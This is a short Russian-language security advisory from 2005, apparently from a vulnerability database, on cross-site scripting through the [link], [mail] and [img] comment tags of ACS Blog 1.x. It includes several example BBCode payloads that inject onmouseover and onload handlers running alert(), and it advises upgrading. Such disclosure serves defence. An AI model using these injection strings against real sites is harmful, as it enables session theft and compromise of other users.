Межсайтовый скриптинг в ACS Blog
- Дата публикации:
- 04.04.2005
- Дата изменения:
- 24.03.2009
- Всего просмотров:
- 917
- Опасность:
- Средняя
- Наличие исправления:
- Да
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Удаленная
- Воздействие:
- Межсайтовый скриптинг
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
- ACS Blog 1.x
Описание:
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует из-за некорректной обработки входных данных в комментариях в тегах [link], [mail], и [img]. Удаленный пользователь может с помощью специально сформированного тега опубликовать злонамеренный HTML сценарий и выполнить его в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
[link=http://www.google.com' onmouseover='alert("XSS vulnerability")'
o=']Don't
you wanna see where this link goes?[/link]
[mail=bugtraq@securityfocus.com' onmouseover='
alert("XSS vulnerability")'
o=']Mr. Wiggles[/mail]
[img]http://www.example.com/image.jpg' onload='
alert("XSS vulnerability")'
o='[/img]
[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]
URL производителя: www.asppress.com
Решение: Установите последнюю версию с сайта производителя.
Журнал изменений:
24.03.2009
Изменена секция "Решение"
Ссылки:
Multiple XSS vulnerabilities in ACS Blog